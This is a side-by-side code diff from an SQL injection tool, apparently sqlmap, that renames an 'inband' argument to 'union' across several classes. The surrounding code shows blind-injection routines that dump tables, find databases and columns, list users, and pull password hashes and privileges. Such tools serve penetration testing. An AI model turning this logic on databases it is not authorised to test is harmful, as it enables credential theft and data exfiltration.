entries = {} entries = {}
@ -255,7 +255,7 @@ class Entries:
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
for column in colList: for column in colList:
if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), inband=False, error=False) == '0': if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0':
emptyColumns.append(column) emptyColumns.append(column)
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
debugMsg += "dumped as it appears to be empty" debugMsg += "dumped as it appears to be empty"
@ -284,7 +284,7 @@ class Entries:
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, column, tbl) query = rootQuery.blind.query % (index, column, tbl)
value = NULL if column in emptyColumns else inject.getValue(query, inband=False, error=False, dump=True) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
value = '' if value is None else value value = '' if value is None else value
_ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))


@ -103,7 +103,7 @@ class Search:
query += dbQuery query += dbQuery
query += exclDbsQuery query += exclDbsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no database" warnMsg = "no database"
@ -127,7 +127,7 @@ class Search:
query += ") AS foobar" query += ") AS foobar"
query = agent.limitQuery(index, query, dbCond) query = agent.limitQuery(index, query, dbCond)
value = inject.getValue(query, inband=False, error=False) value = inject.getValue(query, union=False, error=False)
value = safeSQLIdentificatorNaming(value) value = safeSQLIdentificatorNaming(value)
foundDbs.append(value) foundDbs.append(value)
@ -213,7 +213,7 @@ class Search:
query = rootQuery.blind.count query = rootQuery.blind.count
query += tblQuery query += tblQuery
query += whereDbsQuery query += whereDbsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no databases have table" warnMsg = "no databases have table"
@ -234,7 +234,7 @@ class Search:
query += ") AS foobar" query += ") AS foobar"
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
foundDb = inject.getValue(query, inband=False, error=False) foundDb = inject.getValue(query, union=False, error=False)
foundDb = safeSQLIdentificatorNaming(foundDb) foundDb = safeSQLIdentificatorNaming(foundDb)
if foundDb not in foundTbls: if foundDb not in foundTbls:
@ -258,7 +258,7 @@ class Search:
query = rootQuery.blind.count2 query = rootQuery.blind.count2
query = query % unsafeSQLIdentificatorNaming(db) query = query % unsafeSQLIdentificatorNaming(db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no table" warnMsg = "no table"
@ -278,7 +278,7 @@ class Search:
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
foundTbl = inject.getValue(query, inband=False, error=False) foundTbl = inject.getValue(query, union=False, error=False)
kb.hintValue = foundTbl kb.hintValue = foundTbl
foundTbl = safeSQLIdentificatorNaming(foundTbl, True) foundTbl = safeSQLIdentificatorNaming(foundTbl, True)
foundTbls[db].append(foundTbl) foundTbls[db].append(foundTbl)
@ -431,7 +431,7 @@ class Search:
query += colQuery query += colQuery
query += whereDbsQuery query += whereDbsQuery
query += whereTblsQuery query += whereTblsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no databases have tables containing column" warnMsg = "no databases have tables containing column"
@ -452,7 +452,7 @@ class Search:
if Backend.isDbms(DBMS.DB2): if Backend.isDbms(DBMS.DB2):
query += ") AS foobar" query += ") AS foobar"
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
db = inject.getValue(query, inband=False, error=False) db = inject.getValue(query, union=False, error=False)
db = safeSQLIdentificatorNaming(db) db = safeSQLIdentificatorNaming(db)
if db not in dbs: if db not in dbs:
@ -487,7 +487,7 @@ class Search:
query = query % db query = query % db
query += " AND %s" % colQuery query += " AND %s" % colQuery
query += whereTblsQuery query += whereTblsQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no tables contain column" warnMsg = "no tables contain column"
@ -507,7 +507,7 @@ class Search:
query += " AND %s" % colQuery query += " AND %s" % colQuery
query += whereTblsQuery query += whereTblsQuery
query = agent.limitQuery(index, query) query = agent.limitQuery(index, query)
tbl = inject.getValue(query, inband=False, error=False) tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True)


@ -111,7 +111,7 @@ class Users:
else: else:
query = rootQuery.blind.count query = rootQuery.blind.count
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the number of database users" errMsg = "unable to retrieve the number of database users"
@ -127,7 +127,7 @@ class Users:
query = rootQuery.blind.query2 % index query = rootQuery.blind.query2 % index
else: else:
query = rootQuery.blind.query % index query = rootQuery.blind.query % index
user = inject.getValue(query, inband=False, error=False) user = inject.getValue(query, union=False, error=False)
if user: if user:
kb.data.cachedUsers.append(user) kb.data.cachedUsers.append(user)
@ -252,7 +252,7 @@ class Users:
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "unable to retrieve the number of password " warnMsg = "unable to retrieve the number of password "
@ -277,7 +277,7 @@ class Users:
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index)
password = inject.getValue(query, inband=False, error=False) password = inject.getValue(query, union=False, error=False)
password = parsePasswordHash(password) password = parsePasswordHash(password)
passwords.append(password) passwords.append(password)
@ -467,7 +467,7 @@ class Users:
else: else:
query = rootQuery.blind.count % user query = rootQuery.blind.count % user
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if Backend.isDbms(DBMS.ORACLE) and not query2: if Backend.isDbms(DBMS.ORACLE) and not query2:
@ -500,7 +500,7 @@ class Users:
query = rootQuery.blind.query % (index, user) query = rootQuery.blind.query % (index, user)
else: else:
query = rootQuery.blind.query % (user, index) query = rootQuery.blind.query % (user, index)
privilege = inject.getValue(query, inband=False, error=False) privilege = inject.getValue(query, union=False, error=False)
# In PostgreSQL we get 1 if the privilege is True, # In PostgreSQL we get 1 if the privilege is True,
# 0 otherwise # 0 otherwise